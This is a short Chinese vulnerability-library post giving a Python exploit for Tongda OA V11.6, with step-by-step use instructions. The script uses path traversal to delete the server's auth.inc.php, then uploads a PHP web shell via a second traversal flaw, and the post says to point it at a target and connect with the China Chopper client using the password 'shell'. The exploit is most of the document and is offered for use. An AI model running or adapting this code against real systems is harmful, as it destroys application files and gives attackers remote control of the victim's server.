—
title: ‘通达OA 11.6文件删除+文件上传getshell’
date: Fri, 04 Sep 2020 06:11:50 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
### 漏洞范围
通达OA V11.6
### 漏洞验证
##### EXP:
“`
import requests
target=”http://********/”
payload=””
print(“[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA”)
input(“Press enter to continue”)
print(“[*]Deleting auth.inc.php….”)
url=target+”/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php”
requests.get(url=url)
print(“[*]Checking if file deleted…”)
url=target+”/inc/auth.inc.php”
page=requests.get(url=url).text
if ‘No input file specified.’ not in page:
print(“[-]Failed to deleted auth.inc.php”)
exit(-1)
print(“[+]Successfully deleted auth.inc.php!”)
print(“[*]Uploading payload…”)
url=target+”/general/data_center/utils/upload.php?action=upload&filetype=tql&repkid=/.<>./.<>./.<>./”
files = {‘FILE1’: (‘shell.php’, payload)}
requests.post(url=url,files=files)
url=target+”/_shell.php”
page=requests.get(url=url).text
if ‘No input file specified.’ not in page:
print(“[+]Filed Uploaded Successfully”)
print(“[+]URL:”,url)
else:
print(“[-]Failed to upload file”)
“`
1.保存上述exp为.py脚本文件 2.替换exp中的target为目标url 3.执行脚本后菜刀连接输出的URL:`**********`即可,密码为shell
请登录后查看评论内容